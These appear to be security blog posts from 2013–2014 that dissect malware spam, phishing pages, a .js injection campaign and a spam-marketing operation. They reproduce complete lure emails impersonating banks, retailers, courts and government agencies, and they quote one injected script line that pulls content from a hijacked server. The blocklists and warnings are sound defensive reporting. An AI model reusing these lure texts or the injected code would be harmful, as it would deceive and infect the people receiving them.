Sponsored by..

Tuesday 21 January 2014

Something evil on 5.254.96.240 and 185.5.55.75

This malware attack appears to be aimed at German speakers, and is presumably spreading through spam although I don't have a sample of the email message. What I do have is a nasty EXE-in-ZIP payload that masquerades as a bill or other communication from Deutsche Telekom, Vodafone, Fiducia or Volksbank.


URLquery shows one such download in this example, the victim has been directed to [donotclick]gf-58.ru/telekom_deutschland which in turn downloads a ZIP file Rechnungsruckstande_9698169830015295.zip which in turn contains a malicious executable Mitteilung, Rechnungsruckstande 9901169820005294 Telekom Deutschland GmbH vom Januar 2014.exe which has a VirusTotal detection rate of 7/48.


The malware is downloaded from a server at 5.254.96.240 (Voxility, Romania). Sample URLs on this server (according to URLquery and VirusTotal) are:

[donotclick]gdevseesti.ru/telekom_deutschland/
[donotclick]gdevseesti.ru/vodafone_online/
[donotclick]gf-58.ru/telekom_deutschland/
[donotclick]gf-58.ru/volksbank_eg/
[donotclick]goodwebtut.ru/fiducia/
[donotclick]goodwebtut.ru/telekom_deutschland/
[donotclick]goodwebtut.ru/vodafone_online/
[donotclick]mnogovsegotut.ru/fiducia/
[donotclick]uiuim.ru/fiducia/

The Anubis report and ThreatExpert report [pdf] show that the malware calls home to dshfyyst.ru on 185.5.55.75 (UAB "Interneto vizija", Lithunia). There are some other suspect sites on the same server which may be worth blocking (see below).

All these sites are .ru domains registered to the infamous "Private Person" so there are no clues as to their ownership.

Recommended blocklist:
5.254.96.240
gf-58.ru
uiuim.ru
okkurp.ru
gdevseesti.ru
goodwebtut.ru
mnogovsegotut.ru
185.5.55.75
gossldirect.ru
dshfyyst.ru

Update: this appears to be Cridex aka Feodo, read more.

Monday 20 January 2014

WhatsApp "A friend of yours has just sent you a pic" spam

This fake WhatsApp spam has a malicious attachment:

Date:      Mon, 20 Jan 2014 06:23:28 -0500 [06:23:28 EST]
From:      WhatsApp [{messages@whatsapp.com}]
Subject:      A friend of yours has just sent you a pic

Hey!

Someone you know has just sent you a pic in WhatsApp. Open attachments to see what it is.

� 2013 WhatsApp Inc

Attached to the message is a an archive file IMG9900882.zip which in turn contains a malicious exectuable IMG9900882.exe which has a VirusTotal detection rate of 20/49. The Malwr analysis gives few clues as to what the malware does, other automated analysis tools are inconclusive.

"Thank you for scheduling a payment to Bill Me Later" spam

This fake Bill Me Later spam has a malicious attachment:
Date:      Mon, 20 Jan 2014 14:23:08 +0000 [09:23:08 EST]
From:      Bill Me Later [service@paypal.com]
Subject:      Thank you for scheduling a payment to Bill Me Later

BillMeLater
   
Log in here
       
Your Bill Me Later® statement is now available!

Dear Customer,

Thank you for making a payment online! We've received your
Bill Me Later® payment of $1603.57 and have applied it to your account.

For more details please check attached file

Summary:

Your Bill Me Later Account Number Ending in: 0266

You Paid: $1603.57

Your Payment Date*: 01/20/2014

Your Payment Confirmation Number: 971892583971968191

Don't forget, Bill Me Later is the perfect way to shop when you want more time to pay for the stuff you need. Plus, you can always find great deals and discounts at over 1000 stores. Watch this short, fun video to learn more.

BillMeLater

*NOTE: If your payment date is Saturday, or a holiday, it will take an additional day for the payment to appear on your account. However, you will be credited for the payment as of the payment date.
Log in at PayPal.com to make a payment
Questions:
Do not reply to this email. Please send all messages through the email form on our website. We are unable to respond to account inquiries sent in reply to this email. Bill Me Later is located at 9690 Deereco Rd, Suite 110, Timonium, MD 21093 Copyright 2012 Bill Me Later Inc.

Bill Me Later accounts are issued by WebBank, Salt Lake City Utah

PQW688PP1

Attached is an archive file PP_03357442.zip which in turn contains a malicious executable PP_03357442.exe which has a VirusTotal detection rate of just 4/45. Automated analysis tools [1] [2] show an attempted connection to jatit.org on 72.9.158.240 (Colo4, US) which appears to be a legitimate (but presumably compromised) site.

Thursday 16 January 2014

"ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)" spam

This spam with a lengthy subject has a malicious attachment:

Date:      Thu, 16 Jan 2014 09:39:28 -0600 [10:39:28 EST]
From:      "support@salesforce.com" [support@salesforce.com]
Subject:      ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)
Priority:      High Priority 2

This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited.

Record ID: HJRQY9PSXBSK334

Supplier: http://[victimdomain.com]

Invoice No.: 5644366804

Document No.: 3319683775

Invoice amount: USD 0488.21

Rejection reason(s): Approval Required
Please find enclosed a record of invoice that could not be processed. We would like to ask you to assist us in resolving the noted rejection reasons. 
Attached is a file SFHJRQY9PSXBSK334.zip which in turn contains a malicious executable SF.EXE which has an icon that makes it look like a PDF file. This file has a very low detection rate at VirusTotal of 2/48. The Malwr analysis shows an attempted connection to centrum.co.id on 75.98.233.44 (Ceranet, US). This is the only site on that server, blocking either the IP or domain might be useful.

Ongoing Fake flash update via .js injection and SkyDrive, Part I

Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious.

Here is a case in point.. the German website physiomedicor.de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report. In this case it's pretty easy to tell what's going on from the URLquery screenshot:


What has happened is that somehow an attacker has altered several .js files on the victim's site and has appened extra code. In this case the code has been appened to [donotclick]www.physiomedicor.de/assets/rollover.js  as follows (click to enlarge):


In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia.com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:

[donotclick]berriesarsuiz.com/ptc84vRb.php?id=117515949
[donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444

This second script was found in the high-profile ilmeteo.it hack earlier today, but I've seen it over the past couple of days in other attacks too. The format of the script and method of the attack are too similar to be a coincidence.

This first script [pastebin] identifies itself as coming from Adscend Media LLC .. but of course that's just a comment in the script and could be fake, so let's dig a little deeper.  The key part of this script is a line that says:
document.getElementById('gw_iframe').src = 'http://ghionmedia.com/PROjes/imgfiles/b.html';
..that leads to this script [pastebin] and apart from a load of other stuff you can clearly see another reference to Adscend Media and adscendmedia.com:
    function openpp() {
        //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');
    }

The adscendmedia.com link contains an aff=8663 affiliate ID which indicates that some other party other than Adscend Media LLC may be responsible. This link comes up black when I try to follow it, which might mean a number of things (even the possibility that Adscend Media have terminated the affiliate).

The "other stuff" I mentioned includes a download from skydrive.live.com which is the same thing mentioned in this F-Secure post yesterday. (You can read more about this in Part II)

Adscend Media say that the affiliate was suspended from their network (see the comments below) and they have no control over the code that is showing. Specifically:
..these attacks are not using our advertising services in ANY way. They simply have copied the Javascript code of our content-locking product and used it for their own purposes. Therefore to call this "an Adscend Media ad" is not accurate. In the previous case, there was a commented-out line of Javascript code (where they had replaced our code with their new code), and we were able to see an account number of the person who copied our script, and we suspended the account, however at no point has our real service been used to spread malware. If a person were to copy HTML source code from this page, and use it on a blog that infects users with malware, it would be damaging to your name to repeatedly tie you to something over which you have no control, and that is what is happening here with our company.

You can read part 2 of the analysis here.

Cushion Redirect sites using hijacked GoDaddy domains to block

A very quick write-up about some suspect activity on 194.28.175.129 (BESTHOSTING-AS ON-LINE Ltd, Ukraine) which appears to be hosting some Cushion Redirect domains (explained here) which is being injected into certain sites such as the one in this URLquery report.

A brief examination of the server shows several subdomains of hijacked GoDaddy domains being used for malicious redirects:

d6ld9uir6jgsgasgtfpoff7.yourchicagohummerlimo.com
ht6u1tyyljcketu4b938smf50395383e2197583fa67bd84d474af039.yourbestpartybus.com
770pa3hd21uo1q7wqa5thgh.amateurloginfree.com
d6ld9uir6jgsgasgtfpoff74159538404f0858918145d34c8200d5a7.yourchicagohummerlimo.com
xxctp7yqtwncubsewi6t7pp.yourchicagocarservice.com
63t31l30mdhlep1d0kx82tn70845384049a336c6dc8d7ede92b1d341.yourchicagogranite.com
qxwnnzei6redpxlwbfz1cxg.amateurloginfree.com
ht6u1tyyljcketu4b938smf.amateurloginfree.com
ht6u1tyyljcketu4b938smf50395383e20f64a2782cfdac4ee94285a.yourbestpartybus.com
y1ji3w0l1teth2ydh2k0epj.allgaysitespassfree.com

The hijacked GoDaddy domains in question are:
allgaysitespassfree.com
amateurloginfree.com
yourchicagocarservice.com
yourchicagogranite.com
yourchicagohummerlimo.com
yourbestpartybus.com

A quick look at the Google stats for AS42655 indicate to me personally that blocking 194.28.172.0/22 might be a prudent idea if you don't have any reason to send traffic to Ukrainian sites.

ilmeteo.it hacked

Popular Italian weather site ilmeteo.it appears to have been compromised this morning, with several legitimate .js files on the site altered to drive traffic towards a malicious hacked domain at karsons.co.uk.

The payload is unclear because at the moment the payload site itself is out of bandwidth. It could either be a malware payload or possibly a rogue ad network (which could also be used to spread malware).

According to Alexa statistics, itlmeteo.it is the 29th most popular site in Italy and the 1305th most popular worlwide.

This URLquery report shows the scripts with the injected code:


The injection attempts to run code at [donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444 and it can be found in the site's .js files (for example [donotclick]http://www.ilmeteo.it/im10.js). Right at the moment the site has exceeded its bandwidth and is erroring out.

It's hard to say exactly what the payload is or how many users may have been impacted. I've seen a few of these attacks recently that look like they are linked to a rogue ad network, but I can't confirm it in this case.

Update: site appears to be clean as of 1133 CET according to URLquery.

Wednesday 15 January 2014

Staples "Your order is awaiting verification!" spam

This fake Staples spam has a malicious attachment:

Date:      Wed, 15 Jan 2014 15:40:44 +0800 [02:40:44 EST]
From:      Staples Advantage Orders [Order@staplesadvantage.com]
Subject:      Your order is awaiting verification!
                                           
Order Status: Awaiting verification
Order #: 5079728
Your order has been submitted and is awaiting verification from you.
Order #:     5079728
Order Date and Eastern Time:     2/19/2013 12:28 PM
Order Total:     $152.46
   
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance.
For Staples Advantage Support, call 1-800-633-6080 or email Support@staplesadvantage.com.
Attached is a ZIP file Order_5079728.zip which in turn contains a malicious executable  Order_{_partorderb}.exe which has a VirusTotal detection rate of 23/47.  The Malwr report is pretty inconclusive, so presumably the binary is hardened against automated analysis tools.

Tuesday 14 January 2014

PG&E "Gas and Electric Usage Statement" spam


This fake spam from the Pacific Gas & Electric company is presumably meant to have a malicious payload, but all I get is a server error..

From:     PG&E [do_not_reply@sourcefort.com]
Reply-To: PG&E [do_not_reply@sourcefort.com]
Date:     14 January 2014 22:37
Subject:     Gas and Electric Usage Statement

PG & E ENERGY STATEMENT             Account No: 718198305-5
                                                Statement Date: 01/10/2014
                                                Due Date: 02/01/2014
Your Account Summary

Amount Due on Previous Statement           $344.70

Payment(s) Recieved Since Last Statement   0.0 

Previous Unpaid Balance                    $344.70

Current Electric Charges                   $165.80
Current Gas Charges                        49.20   

Total Amount Due BY 02/01/2014 $559.7

To view your most recent statement, please click here You must log-in to your account or register for an online account to view your statement.
 

Total Amount Due BY 02/01/2014 $559.7





To give PG&E full credit, they have a link on their homepage about it and a full warning here. These scam emails seem to have been doing the rounds for quite a few days now.

"Uncensored download" spam leads to adware

I've been plagued with these over the past few days, emails coming in with the following subjects:

Underground XXX files
Free porno torrents
Uncensored download


The body text contains just a link to [donotclick]goinst.com/download/getfile/1205000/0/?q=Uncensored%20download

In turn this downloads a file Uncensored download__3516_i263089565_il6090765.exe and of course that's about as trustworthy as a van with "FREE CANDY" scrawled on the side. In blood.

A quick look at the EXE in VirusTotal indicates that it's some sort of Adware, probably pay-per-install. An examination of the binary shows a digital signature for Shetef Solutions & Consulting (1998) Ltd who are probably not behind the spam run, but are probably inadvertently paying the spammers for installations.

A Malwr analysis of the file can be found here.

Avoid.

HSBC "Payment Advice" spam / Payment Advice.exe


This fake HSBC spam comes with a malicious attachment:

Date:      Tue, 14 Jan 2014 11:57:29 -0300 [09:57:29 EST]
From:      HSBC Advising Service [advising.service.738805677.728003.693090157@mail.hsbcnet.hsbc.com]
Subject:      Payment Advice - Advice Ref:[G72282154558] / Priority payment / Customer Ref:[63 434S632U9I]


Sir/Madam

The attached payment advice is issued at the request of our customer. The advice is for your reference only.

Yours faithfully

Global Payments and Cash Management

HSBC

***************************************************************************

This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.

***************************************************************************

This e-mail is confidential. It may also be legally privileged. If you are not the addressee you may not copy, forward, disclose or use any part of it. If you have received this message in error, please delete it and all copies from your system and notify the sender immediately by return e-mail.

***************************************************************************

"SAVE PAPER - THINK BEFORE YOU PRINT!"
The is an attachment Payment Advice [G72282154558].zip which contains an executable Payment Advice.exe with a VirusTotal detection rate of 12/48. Automated analysis by Comodo CAMAS shows an attempted connection to thebostonshaker.com on 206.190.147.139 (Salt Lake City Hosting, US). It is the only site on this IP address, blocking either temporarily may give some protection.

Monday 13 January 2014

"Department of Treasury Notice of Outstanding Obligation" spam

This US Treasury spam (but apparently sent from salesforce.com) has a malicious attachment:

Date:      Mon, 13 Jan 2014 18:54:16 +0700 [06:54:16 EST]
From:      "support@salesforce.com" [support@salesforce.com]
Subject:      Department of Treasury Notice of Outstanding Obligation - Case H6SYVMK704BX4AL

Important  please review and sign the attached document!

We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.

In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue.  Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.

Questions should be directed to the Federal Service Desk at:

http://www.bpn.gov/ccr/Help.aspx
Phone : 1-866-606-5048
Int. Phone 1-344-206-5406 for international calls
For DSN, dial 809-463-3029. Wait for a dial tone, and then dial 866-606-5472. 
Attached is a file FMS-Case-H6SYVMK704BX4AL.zip (VirusTotal detection rate 7/47) which in turn contains a malicious executable FMS-Case-{_Case_DIG}.exe (detection rate also 7/47). The Malwr analysis shows an attempted connection to anggun.my.id on 38.99.253.234 (Cogent, US). This seems to be the only domain on that server, blocking either may be prudent.

Friday 10 January 2014

Marketing1.net spam

These spammers sent their sales pitch to a random info@ email address on an unused domain I use. And what are they selling? Email marketing lists.. well, if they used their own mailing list for this then it is obviously crap.

From:     Audrey Martin [info@globalcrm-eu.net]
Reply-To:     info@globalcrm-eu.net
Date:     10 January 2014 07:32
Subject:     Happy New Year! - Followup to our last offer

Dear Madam, Dear Sir

Everyone in our team would like you wish you a happy and successful new year 2014! To help make this year even better for you, we have decided to give 20'000 free business contacts to the first 200 people visiting our website this morning! You don't have to buy anything. You can just visit our website and download the free business contacts!

Over the last year, we have helped hundreds of businesses like yours find new customers and achieve growth by using our highly targeted business database on CD. Our database, available for download from our website, is the only one on the market which includes targeted info on over 5 million Businesses in the UK.

Last December, we decided to take our Business Database CD off the market after a last sale because the cost to update the database regularly had become too high and we want to concentrate on the development of new products.

A lot of businesses since then, requested us to renew our last sale after its discontinuation. Not only have we decided to renew our last offer for a period of 8 hours (until 4PM this afternoon) before finally taking the database off the market, but we have decided to give to the first 200 people visiting our website this morning 20'000 free business contacts.

Here is a quick reminder of what is offered in our Business Database CD:

- 5 million Businesses in the UK selectable by Industry/Location/Company Size/Premises type/Job title
- Over 300,000 Businesses with email addresses
- 4 million named Decision Makers available by job function
- Unlimited export to .CSV or Excel
- Updated in October

We have decided to give you a last opportunity to get your hands on the database, as we are convinced it can dramatically help your business. We are offering to the first 100 customers placing their order today before 4PM, an unrestricted version of the database with unlimited export capabilities (as opposed to the standard version which has a limit of 50'000 exports) - and this, for a substantially reduced price of £199 instead of £498!  This will end at 4PM today, so don't miss it because some your competitors won't!


20'000 Free Business Contacts

We are so confident that the extensive data can help your business that we are giving away a free sample with 20'000 Business contacts to the first 200 people visiting our website this morning. This allows you to evaluate the quality of the data before completing your purchase. Visit our website to download the free sample and jumpstart your business!

To download the free sample, to get more infos or place your order, click here to visit our website

To your success in 2014 and beyond,

Audrey Martin
Marketing Solutions

Unsubscribe: Click here if you do not want to receive any further emails from us

This is a service from Marketing Solutions

Powered by Hairyspire

The link in the email goes to a domain globalcrm-eu.net on 217.147.82.106 (Iomart, UK) which is also the server sending the spam. The domain is registered with incomplete WHOIS details to mak the sender's identity. From there the victim is sent to m1databases-uk.net on a shared server at 66.96.161.162 (Endurance International Group, US) also with incomplete WHOIS records until they end up on the main site at marketing1.net hosted at 89.187.86.69 (Coreix, UK). The WHOIS details for this last one are inconclusive:

Domain Name: MARKETING1.NET
Registry Domain ID: 91418733_DOMAIN_NET-VRSN
Creation Date: 2002-10-21 18:13:12Z
Registrar Registration Expiration Date: 2014-10-21 18:13:12Z
Registrar: ENOM, INC.
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4252744500
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: MARKETING SOLUTIONS
Registrant Organization: -
Registrant Street: 152 CITY ROAD
Registrant City: LONDON
Registrant State/Province: LONDON
Registrant Postal Code: EC1V 2NX
Registrant Country: GB

Registrant Phone: +1.20814497
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext:
Registrant Email: MAIL@MARKETING1.NET
Registry Admin ID: 
Admin Name: MARKETING SOLUTIONS
Admin Organization: -
Admin Street: 152 CITY ROAD
Admin City: LONDON
Admin State/Province: LONDON
Admin Postal Code: EC1V 2NX
Admin Country: GB
Admin Phone: +1.2081449762
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext:
Admin Email: MAIL@MARKETING1.NET
Registry Tech ID: 
Tech Name: MARKETING SOLUTIONS
Tech Organization: -
Tech Street: 152 CITY ROAD
Tech City: LONDON
Tech State/Province: LONDON
Tech Postal Code: EC1V 2NX
Tech Country: GB
Tech Phone: +1.2081449762
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: MAIL@MARKETING1.NET
Name Server: NS10.DNSMADEEASY.COM
Name Server: NS11.DNSMADEEASY.COM
Name Server: NS12.DNSMADEEASY.COM
Name Server: NS13.DNSMADEEASY.COM
DNSSEC: unSigned
Last update of WHOIS database: 2013-10-22 09:22:28Z

This address is an accommodation address that serves hundreds of different companies. I cannot find a trace of a company called Marketing1 or Marketing Solutions registered to this address at Companies House.

The marketing1.net website looks slick enough..

But again it give no real indication as to who owns or runs the company anywhere. The only contact details are as follows:

Marketing1
152 City Road
UK - London EC1V 2NX

Tel: +44 208 144 9762
email: contact@marketing1.net
The 89.187.86.69 server also contains a number of other related domains with fake or incomplete WHOIS details:
m1data-eu.net
m1data-global.net
m1databases-eu.net
m1databases.net
m1de-tracking.net
m1deglobal-tracking.net
m1sitetracking-eur.net
marketing1-app.net
marketing1-eu.net
marketing1-eur.net
marketing1-europe.net
marketing1-group.net
marketing1-soft.net
marketing1.net
marketing1base.net
marketing1data.net
marketing1europe.net
marketing1global.net
marketing1globalsite.net
marketing1group-europe.net
marketing1group.net
marketing1site-eu.net
marketing1soft.net
marketing1solutions.net
top-managers.com

You should never buy anything promoted through spam, and it is especially important not to buy email lists in this way. You (as the sender) will end up with the legal liability for anything that you do, but Marketing1 masks whoever is the true owner.. so good luck with ever finding that out (I suspect they are not based in the UK at all). Avoid.

UPDATE 2014-05-09: these grubby spammers are at it again, using the domain m1-datacrmeu.net to mask their true domain. I took a look at these "20'000" free records, and the ones I checked were laughably out-of-date. No wonder the database is so cheap!

Wednesday 8 January 2014

More "Voice Message from Unknown" spam

Another bunch of fake "voice message" spams with a malicious payload are doing the rounds, for example:

Subject: Voice Message from Unknown (996-743-6568)
Subject: Voice Message from Unknown (433-358-8977)
Subject: Voice Message from Unknown (357-973-7738)

Body:
- - -Original Message- - -

From: 996-743-6568

Sent: Wed, 8 Jan 2014 12:06:38 +0000

To: [redacted]

Subject: Important Message to All Employees  
Attached is a file VoiceMessage.zip which in turn contains VoiceMessage.exe which has a VirusTotal detection rate of 11/47. Automated analysis tools [1] [2] show an attempted connection to casbir.com.au on 67.22.142.68 (Cologlobal, Canada). This appears to be the only server on this IP address, so blocking or monitoring it for the time being may be prudent.

Monday 6 January 2014

"Unauthorized Activity on your Amazon account" phish

The New Year seems to have brought a new wave of phishing emails, here's a new one looking for Amazon credentials.

Date:      Mon, 6 Jan 2014 08:19:39 -0000 [03:19:39 EST]
From:      Amazon [noreply@trysensa.com]

Case- 91289-90990

Unauthorized Activity on your Amazon account.

We recently confirmed that you had unauthorized activity on your Amazon account.

Please be assured that because your card includes "zero-liability fraud protection" , you are not responsible for unauthorized use of your card.

Unfortunately, we have not confirmed your complete information , please follow the instructions below.

Click the link below to validate your account information using our secure server:

Click Here To Active Your Amazon Account

For your protection, you must verify this activity before you can continue using your account

Thank You.
Amazon LTD Security System
The link in the email goes to [donotclick]immedicenter.com/immedicenter/images/yootheme/menu/Amazon/index.php and comes up with a convincing-looking Amazon login page:


The next page phishes for even more information:


And now it goes after your credit card information:

And having stolen all your information, you get a nice message to say thank-you:

The hapless victim then gets sent to the genuine Amazon.com website.

In most email clients, floating over the link would clearly demonstrate that this was not the legitimate amazon.com website, and certainly once visited (not something I would recommend) then the address bar at the top of the browser would clearly indicate it is not amazon.com.

If you have accidentally clicked through this email and provided all the details then you should contact your bank immediately and also change your Amazon password plus any other places that you use that same username/password combination.

Tracking the fake profiles used by scammers

My interest was grabbed by this weirdly mistranslated email, which appears to have been badly written in English and then put through a translator program that has stumbled over the original email's bad punctuation.

From:     mark dave [markdave440@gmail.com]
Reply-To:     markpetersloanfirm@gmail.com
Date:     6 January 2014 00:37

أنا السيد مارك بيترز مشروعة والمقرض القرض السمعة. نحن
شركة ديناميكية بقروض من assistance.We المالية إلى الأفراد
في حاجة إلى المساعدة المالية، التي لديها سوء الائتمان أو في حاجة الى المال
لتسديد الفواتير، للاستثمار في بأعمال تجارية ترغب في استخدام هذه الوسيلة لأبلغكم
أننا تقديم المساعدة موثوقة والمستفيد كما نكون سعداء لتقديم لكم
وloan.contact بنا عبر عنوان البريد الإلكتروني: markpetersloanfirm@gmail.com
وتشمل الخدمات المقدمة؛ إعادة تمويل، تحسين المنزل، قرض الاستثمار، السيارات
القروض، وتوطيد الدين، خط الائتمان، والرهن العقاري الثانية، والأعمال التجارية
القروض، والقروض الشخصية، قروض السيارات، قروض السيارات.

يرجى الكتابة الى الوراء اذا كانت مهتمة.

الاسم الكامل:
البلد والدولة:
المدينة:
الجنسية:
مبلغ القرض المطلوب:
الجنس:
الإيجار الشهري:
الاتصال الهاتف:
الرمز البريدي:
مدة القرض:
هل تتكلم اللغة الإنجليزية:
This translates roughly as:

I Mr. Mark Peters legitimate and reputable loan lender. We
Dynamic company with loans from financial assistance.We to individuals
In need of financial assistance, that have a bad credit or in need of money
To pay bills, to invest in the business want to use this medium to inform you
We provide reliable and beneficiary assistance as be glad to offer you
And loan.contact us via e-mail address: Markpetersloanfirm@gmail.com
The services provided include; refinance, home improvement, investment loan, car
Loans, debt consolidation, credit line, and a second mortgage, and business
Loans, personal loans, car loans, car loans.

Please write back if interested.

Full name:
Country and State:
City:
Nationality:
The loan amount required:
Gender:
Monthly rent:
Contact Phone:
Zip Code:
Loan term:
Do you speak English:

We are waiting for your responds. 
Obviously this is a scam, but it turns out the "Mark Dave" has a Google+ profile with the following photo:


So who is this a photo of? Well, if you haven't checked out Google Images you might not know just how good the reverse image search is. Clicking the camera icon allows you to upload an image or reverse search an image by URL:



The results for that photo are pretty revealing and lean heavily towards scams:

This thread on RomanceScam.com explains what is going on very well. The pictures belong to an innocent person called Stuart James who has had their online photo collection plundered by scammers in what adds up to a particularly cruel type of identity theft. It is perhaps an object lesson in not sharing too much online, and it seems to be a particular risk for anyone good looking and/or in the military.

ScamDigger also has a gallery of images commonly used by scammers, with the caveat that the people pictured are all innocent parties which makes interesting (but depressing) viewing.

A reverse image search is certainly useful sometimes at uncovering fake profiles, and it's something that anyone with basic computer skills should be able to do. Note that you can also use TinEye to do a similar search with a slightly different set of results, and I guess there are other reverse image search engines available. but between Google and TinEye you should be able to uncover fake profiles with ease.

Thursday 2 January 2014

Windows.old, and the Windows XP to Windows 8.1 gotcha

So I finally got around to the long over-due task of migrating my main system off Windows XP 32-bit (because it is going out of support soon) to Windows 8.1 64-bit because.. well, it's cheaper to go the Windows 8.x route than Windows 7 and 8 does have some interesting features.

You can't really upgrade Windows XP to Windows 8.1 in the traditional sense, it is basically a completely new installation but it does retain your original Windows XP data so you can get to it later. But there's a gotcha here.

Windows 8.1 is a free upgrade to Windows 8, and I already had a Windows 8 upgrade disk that I bought a few months back. Upgrading from Windows XP to Windows 8 does create a set of backup files in a folder called windows.old so you can recover your data, including what was in the C:\Documents and Settings folder. So, in theory you just copy the old data from that folder into your new Documents folder.

Here's the gotcha. If you're like me, you've probably been putting off the Windows 8 upgrade until you can have Windows 8.1 which brings back the Start button. So the obvious next step is to do that (although you need to install KB2871389 to show Windows 8.1 in the app store). You can then do the 3GB+ download to install Windows 8.1 over Windows 8 which runs pretty smoothly. But before you do that.. remember to take your data out of the windows.old folder!

The trap here is that when you upgrade from Windows 8 to Windows 8.1, the contents of the windows.old folder are deleted and overwritten again, destroying the backup data from Windows XP. 

Uh-oh. It's a good job that I'm paranoid about backups, so nothing was lost. But it's easy to see that people could lose data if they don't recover it from windows.old  before they did the Windows 8.1 upgrade.

It really, really is worth investing in some offline storage or other backup medium before you do this. I took the opportunity to clone Windows XP to a new SSD drive before doing the upgrade and I disconnected the original hard disk, and I also made an offline backup to be on the safe side. But if I had just ploughed on and done the deed then I would have lost irreplaceable data. 

Windows 8.1 is.. well, weird. But it does run very quickly on my four-year-old Dell Precision workstation with the SSD drive and a memory upgrade. Apart from the vanishing data it all went remarkably smoothly (if you are knowledgeable about Windows systems) and it didn't require any unpleasantness such as driver disks. The application troubleshooting is pretty awesome for apps that don't run properly under the new OS, and there are only a few really ancient 16-bit apps that I can't get to work that need recoding. Ah well, it should keep the computer up-to-date with security updates until 2023 which should easily be longer than the expected lifespan of the machine..


Friday 27 December 2013

Odd "Wire transfer to your account" spam

Almost all spam tends to be some sort of scam or some sort of malware. I can't quite figure this one out though.

From:     Andrew Chukwu [andrewchukw@gmail.com]
Date:     27 December 2013 13:24
Subject:     Wire transfer to your account

Please review and follow the instruction to get your payment slip,
please get back to us as soon as you get it

Best of Luck
I know better than to open unsolicited .DOC files, so I put it through VirusTotal.. and it came out clean. Joe Sandbox, Malwr, and Malware Tracker all report it as clean too. In fact, the only thing it seems to contain is the following string:
file:///C:/DOCUME~1/AGV/LOCALS~1/Temp/New%20Invoice.htm
The metadata says:

Os: Windows
Version 5.1
Code page: 1252
Author: AGV
Template: Normal
Last Saved By: AGV
Revision Number: 1
Name of Creating Application: Microsoft Office Word
Total Editing Time: 01:00
Create Time/Date: Thu Dec 26 10:15:00 2013
Last Saved Time/Date: Thu Dec 26 10:16:00 2013
Number of Pages: 1
Number of Words: 8
Number of Characters: 48
Security: 0

The email originates from a Gmail IP address, and given the Nigerian sounding name it could simply be a scam email gone wrong, but I would strongly advise you not to open it in any case, just it case it is something far more malicious.

Monday 23 December 2013

"Hearing of your case in Court NR#6976" spam

I've had quite a few spams with a similar payload to this that I can't even Unzip. Go figure. But this one is an interesting variation.

Date:      Mon, 23 Dec 2013 10:05:38 -0500 [10:05:38 EST]
From:      Notice to Appear [support.6@jonesday.com]
Subject:      Hearing of your case in Court NR#6976

 Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 9, 2014 at 10:00
   am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Alison Smith
   Clerk to the Court. 
There is an attachment Court_Notice_Jones_Day_Wa#8127.zip which in turn contains an executable Court_Notice_Jones_Day_Washington.exe which is presumably malicious, but I can't analyse it. The VirusTotal detection rate for the ZIP is 4/49.

Updated: a couple of other variants.. and the ISC have a report now too.

Date:      Mon, 23 Dec 2013 20:02:52 -0400 [19:02:52 EST]
From:      Notice to Appear [ticket_support.6@jonesday.com]
Subject:      Hearing of your case in Court NR#2682

 Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 15, 2014 at
   09:00 am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Olivia Tailor
   Clerk to the Court.

--------------

Date:      Mon, 23 Dec 2013 11:21:46 -0700 [13:21:46 EST]
From:      Notice to Appear [ticket_support.8@jonesday.com]
Subject:      Notice of appearance in court NR#5365

 Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 19, 2014 at
   09:00 am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Jennifer Tailor
   Clerk to the Court.
--------------

Date:      Mon, 23 Dec 2013 21:37:10 -0700 [12/23/13 23:37:10 EST]
From:      Notice to Appear [ticket_support.8@jonesday.com]
Subject:      Urgent court notice NR#31620

Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 11, 2014 at
   11:00 am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Barbara Smith
   Clerk to the Court. 

Update 2 [31/12/2013]  in the past couple of days there has been a renewed spam run with some slightly different details. For some reason I cannot analyse the contents of the ZIP file, but you can be sure that it is malicious.
